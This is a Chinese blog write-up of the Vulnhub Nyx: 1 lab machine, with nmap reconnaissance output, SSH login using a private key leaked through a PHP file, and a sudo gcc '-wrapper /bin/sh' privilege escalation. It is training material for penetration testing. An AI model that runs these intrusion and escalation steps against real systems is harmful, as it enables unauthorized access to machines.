NYX靶场

最新推荐文章于 2024-09-12 08:30:13 发布
最新推荐文章于 2024-09-12 08:30:13 发布
阅读量128 收藏 1
点赞数
分类专栏: Vulnhub 文章标签: 网络安全 安全 安全威胁分析 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/134910312
版权

信息收集

# Nmap 7.94 scan initiated Fri Nov 24 21:59:30 2023 as: nmap -sn -oN live.nmap 192.168.182.0/24
Nmap scan report for 192.168.182.1 (192.168.182.1)
Host is up (0.00044s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.182.2 (192.168.182.2)
Host is up (0.00026s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.182.146 (192.168.182.146)
Host is up (0.00012s latency).
MAC Address: 00:0C:29:E5:96:7D (VMware)
Nmap scan report for 192.168.182.254 (192.168.182.254)
Host is up (0.00025s latency).
MAC Address: 00:50:56:E3:20:98 (VMware)
Nmap scan report for 192.168.182.130 (192.168.182.130)
Host is up.
# Nmap done at Fri Nov 24 21:59:32 2023 -- 256 IP addresses (5 hosts up) scanned in 1.95 seconds

存活主机探测

# Nmap 7.94 scan initiated Fri Nov 24 22:00:05 2023 as: nmap -sT -p- -o port.nmap 192.168.182.146
Nmap scan report for 192.168.182.146 (192.168.182.146)
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E5:96:7D (VMware)

# Nmap done at Fri Nov 24 22:00:08 2023 -- 1 IP address (1 host up) scanned in 2.75 seconds

端口信息的探测,发现存活主机开放端口是80 22端口,上面分别起的服务就是http 和 ssh。主要的突破点在80端口上。

# Nmap 7.94 scan initiated Fri Nov 24 22:00:36 2023 as: nmap -sT --script=vuln -p22,80 -oN vuln.nmap 192.168.182.146
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.182.146 (192.168.182.146)
Host is up (0.00049s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability
MAC Address: 00:0C:29:E5:96:7D (VMware)

# Nmap done at Fri Nov 24 22:01:31 2023 -- 1 IP address (1 host up) scanned in 55.09 seconds

漏洞脚本探测,发现了一个php文件!提示存在管理员administration密码的重置漏洞!

└─# cat details.nmap 
# Nmap 7.94 scan initiated Fri Nov 24 22:00:19 2023 as: nmap -sT -sC -sV -O -p22,80 -oN details.nmap 192.168.182.146
Nmap scan report for 192.168.182.146 (192.168.182.146)
Host is up (0.00077s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA)
|   256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA)
|_  256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: nyx
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E5:96:7D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 24 22:00:28 2023 -- 1 IP address (1 host up) scanned in 8.30 seconds

整体上没什么信息,尝试访问80端口上开启的服务!

渗透测试

整个端口上的服务,也没什么东西。源码中提示我们:

Dont waste your time looking into source codes/robots.txt etc , focus on real stuff

关注一些真正的东西把,不要浪费时间去看源码或者是robots.txt等文件

看看刚才枚举出来的那个php文件是什么!

发现是OPENSSH的私钥!这里的思路就是利用私钥生成公钥,拿到用户名,使用私钥文件进行登录:

将整个文件下载下来保存为id_rsa文件!然后赋予权限600,接下来就是生成公钥文件,利用ssh-keygen

ssh-keygen -y -f id_rsa > id_rsa.pub

查看当前目录下面生成的公钥文件:

拿到一个用户名为mpampis!直接利用私钥文件进行登录!

ssh -i id_rsa mpampis@192.168.182.146

成功登录靶机用户mpampis!查看到该用户的家目录下面存在一个user.txt文件,本以为是密码的md5 hash值。尝试进行md5的破解。但是失败了!怀疑这是一个类似flag的东西~

提权

直接来到提权的阶段。整个提权的过程中,查看了定时任务等信息,但是并没有发现什么有用的定时任务。当利用sudo -l 查看当前用户的权限的时候,发现当前的用户可以在不使用密码的情况下使用gcc!

这里我的思路就是利用gcc命令进行提权,但是具体怎么提权,并不知道,同时进行了google,没找到相关的资料,这里取看了红队笔记的讲解,找了一个姿势!!

GTFOBins

直接搜索gcc!给出的语句是

gcc -wrapper /bin/sh,-s .

-wrapper:允许你指定一个包装器脚本,该脚本将在实际的编译过程中被调用。
"/bin/bash,-s":就是包装器的脚本。/bin/sh 是一个常见的 Unix Shell 的路径,
								-s 是传递给 shell 的选项,它表示读取标准输入。因此,
								这个包装器使用 /bin/sh 作为 shell,并通过 -s 选项来表示将从标准输入读取脚本
.: 这个点表示当前目录。在这个上下文中,它指的是当前目录下的文件。

因此,这个命令的含义是使用 /bin/sh 作为包装器,通过标准输入读取脚本,而这个脚本的内容很可能位于当前目录下。这种方法可能被用于在编译过程中执行一些自定义的操作或者设置环境变量,具体取决于包装器脚本的内容。

Y4y17
关注
专栏目录
nyx靶场复现----------思路整理
qq_52732967的博客
09-10 237
注意id_rsa的权限不能高于600,且我们的主机名字在web网页的标题上获取的。注意到action没有参数,显然没有传递目标,就是兔子洞!直接:sudo gcc -wrapper /bin/sh,-s .则直接编写private key进行ssh连接。显然80端口对我们是最有价值的。显而易见他告诉我们思路错误了。挑衅十足(哥么没注入成功)拿到一个key.php。这个路径是一个key。
红队打靶:Nyx: 1打靶思路详解(vulnhub)
Bossfrank的博客
10-14 778
本文是vulnhub靶机Nyx: 1的详细打靶过程。靶机非常简单,涉及到的知识点主要有:nmap漏洞扫描、ssh私钥登录、sudo提权等。难点可能在于不要遗漏信息、也不要掉进陷阱。。
Vulnhub nyx靶机渗透记录
m0_43424471的博客
10-08 582
环境配置 nyx靶机镜像地址:http://www.vulnhub.com/entry/nyx-1,535/ Kali Linux IP: 192.168.1.128 nyx IP:192.168.1.137 信息收集 利用arp-scan,扫描本地局域网主机: arp-scan -l 利用nmap常规扫描目标主机: nmap -A -p- 192.168.1.137 利用dirb对站点目录进行枚举: dirb http://192.168.1.137 然而并没有找到有价值的界面,尝
vulnhub-Nyx: 1
kongshanzhi的博客
04-10 193
下载安装就不说了。
hekate-ctcaer-6.1.1-Nyx-1.6.1.zip
06-05
hekate官方最新版本,官方正式版本,6.1.1版本(Nyx 1.6.1版本)。因GitHub下载较慢,转存于CSDN。 支持 HOS 18.0.0,修复了 pkg1 问题导致的库存启动失败,如果条件满足(T210B01 或 T210 无 autorcm),将重新启动...
Nyx-开源
04-24
Nyx 是一个开源项目,它的核心是基于 CORBA(Common Object Request Broker Architecture)的 Linux 多媒体框架。这个框架的设计目标是为了提供一个可扩展、灵活且高性能的平台,用于处理多媒体数据,包括音频、视频...
NyxFile:NYX GPU(.nyx)文件加载器
02-15
Nyx文件 NyxFile是可执行文件,用于生成和创建用于Nyx GPU库的.nyx文件。 .NYX文件基本上只是内置了反射数据的着色器二进制文件。 用法 用法:nyxmaker 安装 安装到/ usr / local / bin / NyxFile
Nyx - realtime SNMP network monitor-开源
05-06
**Nyx:实时SNMP网络监控工具** Nyx是一款强大的开源网络监控工具,专为实时监控和IP-MAC地址搜索而设计。它被设计成在大型企业网络环境中运行,能够快速响应并提供有关网络基础设施的详细信息。Nyx的名称来源于...
Nyx (Intrusion Detection System) (nyxnid-开源
06-30
**Nyx入侵检测系统概述** Nyx是一款基于Java开发的开源入侵检测系统(IDS),它设计的主要目的是为了提供网络监控和安全防护。该系统的名字来源于希腊神话中的夜神,象征着在黑暗中揭示威胁和异常行为。Nyx的突出...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1202
本文主要介绍网络安全认识与学习规划
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1835
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 824
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
【Authing身份云-注册安全分析报告-无验证方式导致安全隐患】
09-09 808
Authing身份云隶属于北京蒸汽记忆科技有限公司, 是专业的员工身份管理和用户身份管理服务提供商,为企业和开发者提供快速、安全的身份认证和访问管理方案。基于员工和用户身份管理,Authing 推出了单点登录、自适应多因素认证、手机号码闪验、应用集成网关、权限管理、通用登录组件、自定义数据库连接等产品。作为身份验证的厂家,好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1484
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
GORM安全-保护你的应用免受SQL注入攻击
最新发布
一起coding,一起嗨。
09-12 467
GORM安全-保护你的应用免受SQL注入攻击
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 499
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
剖析Cookie的工作原理及其安全风险
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 1333
Cookie,也称为HTTP cookie、web cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie。
相机外参的确定\n已知量为三个灭点,求相机外参的旋转矩阵\n%%其中Xx,Xy,Xz代表三个灭点的横坐标\nYx,Yy,Yz代表三个灭点的纵坐标\nXx=1358\nXy=3107\nXz=153\nYx=2182\nYy=1540\nYz=913\nu0=(Yx-Yz+(Xz-Xy)/(Yz-Yy)Xx-(Xx-Xy)/(Yx-Yy)Xz)/((Xz-Xy)/(Yz-Yy)-(Xx-Xy)/(Yx-Yy))\nv0=Yz+((Xx-Xy)/(Yx-Yy))(Xz-u0)\nf=sqrt(-((Xz-u0)(Xx-u0)+(Yx-v0)(Yy-v0)))\nA=(sqrt(f.2+(Xy-u0).2+(Yy-v0).2)./sqrt(f.2+(Xz-u0).2+(Yz-v0).2))\na=atan(A)\nB=f/(sqrt((Xy-u0).2+(Yy-v0).2))\nb=atan(B)\nC=abs(Xx-u0)/abs(Yx-v0)\nc=atan©\nR1=[cos(a),0,-sin(a);\n0,1,0;\nsin(a),0,cos(a)]\nR2=[1,0,0;\n0,cos(b),-sin(b);\n0,sin(b),cos(b)];\nR3=[cos©,-sin©,0;\nsin©,cos©,0;\n0,0,1];\nR=R1R2*R3请用matlab代码实现上述内容
07-17
以下是使用MATLAB代码实现相机外参确定的过程: ```matlab % 已知灭点的横纵坐标 Xx = 1358; Xy = 3107; Xz = 153; Yx = 2182;...u0 = (Yx - Yz + (Xz - Xy)/(Yz - Yy)*Xx - (Xx - Xy)/(Yx - Yy)*Xz)/((Xz - Xy)/(Yz -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值